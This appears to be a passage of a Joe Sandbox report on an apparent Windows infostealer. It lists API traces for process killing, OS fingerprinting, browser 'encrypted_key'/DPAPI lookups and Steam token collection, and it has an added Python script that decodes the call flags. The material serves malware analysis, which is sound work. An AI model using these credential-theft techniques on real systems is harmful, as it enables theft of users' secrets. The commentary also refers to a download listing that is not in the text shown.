                                  • Opcode ID: 9ae5a0f231bb97c12b145ce47385dbf7c40dcbb9018bfee4a3eabeab1c24930f
                                  • Instruction ID: 1195b29d5f59fd33fef833f2667055a69b39cbf64ec9f300b49d40aaf7d385ed
                                  • Opcode Fuzzy Hash: 9ae5a0f231bb97c12b145ce47385dbf7c40dcbb9018bfee4a3eabeab1c24930f
                                  • Instruction Fuzzy Hash: 70418070E00208DFDB28CF95D948BDAB7F5FF48724F248069EA189B294D7759982CF90
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00FD4759
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00FD4769
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00FD477B
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FD479C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FD47AB
                                  • CloseHandle.KERNEL32(00000000), ref: 00FD47B2
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00FD47C0
                                  • CloseHandle.KERNEL32(00000000), ref: 00FD47CB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: ada632cb7ca8d37212fda329ca3d240a479547ee0697307354be6844ac686d1c
                                  • Instruction ID: c0c89b47773a576bb160690a9e245a0e4c594d0d189bb79f9292291fb72aa44f
                                  • Opcode Fuzzy Hash: ada632cb7ca8d37212fda329ca3d240a479547ee0697307354be6844ac686d1c
                                  • Instruction Fuzzy Hash: 7A01B9719012186BE7349BF09C89FEE7BFDEB44765F0401A1FA15D5184DB709DC08B61
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00FC8435
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC846C
                                  • lstrlen.KERNEL32(00000000), ref: 00FC84B2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC84E9
                                  • lstrlen.KERNEL32(00000000), ref: 00FC84FF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC852E
                                  • StrCmpCA.SHLWAPI(00000000,00FE4C3C), ref: 00FC853E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 1bf444b92114b9229b3f23c6d3abcbe3d6fbc5eb0112e9cb2672619b5df6468b
                                  • Instruction ID: 2184ed8cd00d7c752663050ea452c125c47c3b289c0fa61f91ef8bf8239ab08b
                                  • Opcode Fuzzy Hash: 1bf444b92114b9229b3f23c6d3abcbe3d6fbc5eb0112e9cb2672619b5df6468b
                                  • Instruction Fuzzy Hash: 6351BE719002068FCB24DF68C985F9AB7F8EF48360F18886DEC55DB309EB75E9429B50
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00FD2925
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD292C
                                  • RegOpenKeyExA.ADVAPI32(80000002,01B8C2B0,00000000,00020119,00FD28A9), ref: 00FD294B
                                  • RegQueryValueExA.ADVAPI32(00FD28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00FD2965
                                  • RegCloseKey.ADVAPI32(00FD28A9), ref: 00FD296F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: 9ef77e94170a2ec2a1dab65df9ee203e89f4ef20fe73351417150ec10d2cce7a
                                  • Instruction ID: 55eac90a15f0af330bbd5caa1f5112900fa100f1754b25393d3af2b9a8238ea0
                                  • Opcode Fuzzy Hash: 9ef77e94170a2ec2a1dab65df9ee203e89f4ef20fe73351417150ec10d2cce7a
                                  • Instruction Fuzzy Hash: 1401F174A00218ABD324CBE09858EEB7BFCEB48725F140068FE449B244E63059448790
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00FD2895
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD289C
                                    • Part of subcall function 00FD2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00FD2925
                                    • Part of subcall function 00FD2910: RtlAllocateHeap.NTDLL(00000000), ref: 00FD292C
                                    • Part of subcall function 00FD2910: RegOpenKeyExA.ADVAPI32(80000002,01B8C2B0,00000000,00020119,00FD28A9), ref: 00FD294B
                                    • Part of subcall function 00FD2910: RegQueryValueExA.ADVAPI32(00FD28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00FD2965
                                    • Part of subcall function 00FD2910: RegCloseKey.ADVAPI32(00FD28A9), ref: 00FD296F
                                  • RegOpenKeyExA.ADVAPI32(80000002,01B8C2B0,00000000,00020119,00FC9500), ref: 00FD28D1
                                  • RegQueryValueExA.ADVAPI32(00FC9500,01B9E688,00000000,00000000,00000000,000000FF), ref: 00FD28EC
                                  • RegCloseKey.ADVAPI32(00FC9500), ref: 00FD28F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 595e5a1b74652dda8e38a129606a041457722eb09c222e08063762b33fbabfdf
                                  • Instruction ID: 9c226852020400d2fe84e32a4b98c62a673607ec3a128ede2c4e2f0cf9265d64
                                  • Opcode Fuzzy Hash: 595e5a1b74652dda8e38a129606a041457722eb09c222e08063762b33fbabfdf
                                  • Instruction Fuzzy Hash: B101A271A00208BBDB28DBE4AC49FAA7BBDEB44715F000165FE18DA384D6705A8497E1
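The raw argument values in the three preceding API listings carry most of the analytic content: the WinINet download routine (ref 00FB565A..) opens the URL with flags 04000100, the process walk (ref 00FD4759..) opens each process with access mask 00000001, and the build-number lookup (ref 00FD294B..) opens HKLM with SAM 00020119. Decoded, those are INTERNET_FLAG_NO_CACHE_WRITE|INTERNET_FLAG_PRAGMA_NOCACHE (the downloaded payload never lands in the WinINet cache), PROCESS_TERMINATE alone (the minimum right needed to kill a process, which is also the least noisy OpenProcess request) and KEY_READ|KEY_WOW64_64KEY (a 32-bit process deliberately reading the native 64-bit registry view). The following Python is an added example written for this page, not Joe Sandbox or Stealc code: it parses lines in the report's "Api.MODULE(args), ref: addr" form, replaces known argument positions with the documented Win32 constants, and tags ordered API subsequences with behaviour labels. The constant tables are the public Win32 values; the capability subsequences and the label names are this example's own heuristics. The input is copied from the listings above.

```python
import re
from typing import Dict, List, Optional, Tuple

# Trace lines copied from the "APIs" listings in this report: the WinINet download
# routine (ref 00FB565A..), the process-termination loop (00FD4759..) and the
# CurrentBuildNumber registry lookup (00FD294B..). Sample input for this example.
TRACE = """\
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FB565A
RtlAllocateHeap.NTDLL(00000000), ref: 00FB5661
InternetOpenA.WININET(00FDCFEC,00000000,00000000,00000000,00000000), ref: 00FB5677
InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00FB5692
InternetReadFile.WININET(?,?,00000400,00000001), ref: 00FB56BC
memcpy.MSVCRT(00000000,?,00000001), ref: 00FB56E1
InternetCloseHandle.WININET(?), ref: 00FB56FA
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00FD4759
Process32First.KERNEL32(00000000,00000128), ref: 00FD4769
Process32Next.KERNEL32(00000000,00000128), ref: 00FD477B
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FD479C
TerminateProcess.KERNEL32(00000000,00000000), ref: 00FD47AB
RegOpenKeyExA.ADVAPI32(80000002,01B8C2B0,00000000,00020119,00FD28A9), ref: 00FD294B
RegQueryValueExA.ADVAPI32(00FD28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00FD2965
"""

LINE_RE = re.compile(r"^(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
HEX_ARG = re.compile(r"[0-9A-Fa-f]{8}")  # Joe Sandbox prints numeric args as 8 hex digits

# (API name, zero-based argument index) -> documented Win32 constants.
# An exact match wins; otherwise the value is split into OR-ed flag names.
ARG_DECODERS: Dict[Tuple[str, int], Dict[int, str]] = {
    ("CreateToolhelp32Snapshot", 0): {0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS",
                                      0x4: "TH32CS_SNAPTHREAD", 0x8: "TH32CS_SNAPMODULE"},
    ("Process32First", 1): {0x128: "sizeof(PROCESSENTRY32)=296"},  # 32-bit ANSI layout
    ("Process32Next", 1): {0x128: "sizeof(PROCESSENTRY32)=296"},
    ("OpenProcess", 0): {0x1: "PROCESS_TERMINATE", 0x8: "PROCESS_VM_OPERATION",
                         0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE",
                         0x400: "PROCESS_QUERY_INFORMATION", 0x1FFFFF: "PROCESS_ALL_ACCESS"},
    ("InternetOpenUrlA", 4): {0x80000000: "INTERNET_FLAG_RELOAD",
                              0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
                              0x00800000: "INTERNET_FLAG_SECURE",
                              0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"},
    ("RegOpenKeyExA", 0): {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
                           0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"},
    ("RegOpenKeyExA", 3): {0x20019: "KEY_READ", 0x100: "KEY_WOW64_64KEY",
                           0x200: "KEY_WOW64_32KEY", 0xF003F: "KEY_ALL_ACCESS"},
    ("SHGetFolderPathA", 1): {0x05: "CSIDL_PERSONAL", 0x1A: "CSIDL_APPDATA",
                              0x1C: "CSIDL_LOCAL_APPDATA", 0x28: "CSIDL_PROFILE"},
}

# Ordered API subsequences that together describe one behaviour (example heuristics).
CAPABILITIES: Dict[str, List[str]] = {
    "download_to_heap": ["RtlAllocateHeap", "InternetOpenUrlA", "InternetReadFile", "memcpy"],
    "process_kill_loop": ["CreateToolhelp32Snapshot", "Process32Next", "OpenProcess", "TerminateProcess"],
    "os_build_fingerprint": ["RegOpenKeyExA", "RegQueryValueExA"],
}


def decode_flags(value: int, table: Dict[int, str]) -> str:
    """Render a numeric argument as symbolic constants from `table`."""
    if value in table:
        return table[value]
    names, rest = [], value
    for bit, name in sorted(table.items(), reverse=True):  # widest masks first
        if bit and rest & bit == bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:X}")  # bits no table entry explains
    return "|".join(names) if names else f"0x{value:X}"


def parse_line(line: str) -> Optional[dict]:
    """Parse one 'Api.MODULE(args), ref: addr' line; other report text yields None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    api, module, arg_text, ref = m.groups()
    decoded = []
    for i, raw in enumerate(arg_text.split(",") if arg_text else []):
        table = ARG_DECODERS.get((api, i))
        if table and HEX_ARG.fullmatch(raw):
            decoded.append(decode_flags(int(raw, 16), table))
        else:
            decoded.append(raw)  # '?' (value unknown to the sandbox) or a string literal
    return {"api": api, "module": module, "args": decoded, "ref": int(ref, 16)}


def decode_trace(text: str) -> List[dict]:
    return [c for c in (parse_line(l) for l in text.splitlines()) if c]


def is_subsequence(pattern: List[str], names: List[str]) -> bool:
    """True if every name in `pattern` appears in `names` in that order (gaps allowed)."""
    it = iter(names)
    return all(any(n == p for n in it) for p in pattern)


def capabilities(calls: List[dict]) -> List[str]:
    names = [c["api"] for c in calls]
    return [cap for cap, pat in CAPABILITIES.items() if is_subsequence(pat, names)]


if __name__ == "__main__":
    decoded_calls = decode_trace(TRACE)
    for c in decoded_calls:
        print(f'{c["ref"]:08X} {c["api"]}({", ".join(c["args"])})')
    print("capabilities:", capabilities(decoded_calls))
```

The decoder is deliberately positional: Joe Sandbox prints stack slots, so an argument index only means something for an API whose prototype is known, and anything the sandbox could not resolve stays as the literal "?" rather than being guessed.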
                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 00FB723E
                                  • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00FB7279
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB7280
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00FB72C3
                                  • HeapFree.KERNEL32(00000000), ref: 00FB72CA
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00FB7329
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                  • String ID:
                                  • API String ID: 174687898-0
                                  • Opcode ID: c30d2b938e64d3bff4cc303b02d85b98b925a08d316d64cb0b15b989ce625a2d
                                  • Instruction ID: b6d4f936ac61015719b2248fe181bbac9477e76cb585724b9902ed8d98ebb4ef
                                  • Opcode Fuzzy Hash: c30d2b938e64d3bff4cc303b02d85b98b925a08d316d64cb0b15b989ce625a2d
                                  • Instruction Fuzzy Hash: 6E416E71B057059BDB20DFAAD884BEAB3E8FB84315F1845A9EC5DCB340E631E940AF50
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 00FB9CA8
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00FB9CDA
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FB9D03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2746078483-738592651
                                  • Opcode ID: ceef33315f6fe0eb9b00d1735734d13a92f98f6dc182d42b4fb327f42c0495f6
                                  • Instruction ID: 029345dc0cc033f423683a9eaddb338c34c06e542085e8303bc134c4f8e0f79c
                                  • Opcode Fuzzy Hash: ceef33315f6fe0eb9b00d1735734d13a92f98f6dc182d42b4fb327f42c0495f6
                                  • Instruction Fuzzy Hash: 7C41B271E042099BCB21EFA6DC816EE77B4AF94314F044064EA55A7342DB74ED04EF80
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00FCEA24
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCEA53
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCEA61
                                  • lstrcat.KERNEL32(?,00FE1794), ref: 00FCEA7A
                                  • lstrcat.KERNEL32(?,01B99278), ref: 00FCEA8D
                                  • lstrcat.KERNEL32(?,00FE1794), ref: 00FCEA9F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: 294f14f45973c7049723f5e77b8a8f01840a96f5bdd363eaa1a65736ce641caa
                                  • Instruction ID: 6e76355fc50d9f5c94395b856e971a80cc732b482f85cf0627c6ee836ce9a488
                                  • Opcode Fuzzy Hash: 294f14f45973c7049723f5e77b8a8f01840a96f5bdd363eaa1a65736ce641caa
                                  • Instruction Fuzzy Hash: 1641A9719101199FCB65EFA4DC42FED77B8BF88300F444468B616AB244DB789E84AF90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCECDF
                                  • lstrlen.KERNEL32(00000000), ref: 00FCECF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCED1D
                                  • lstrlen.KERNEL32(00000000), ref: 00FCED24
                                  • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 00FCED52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
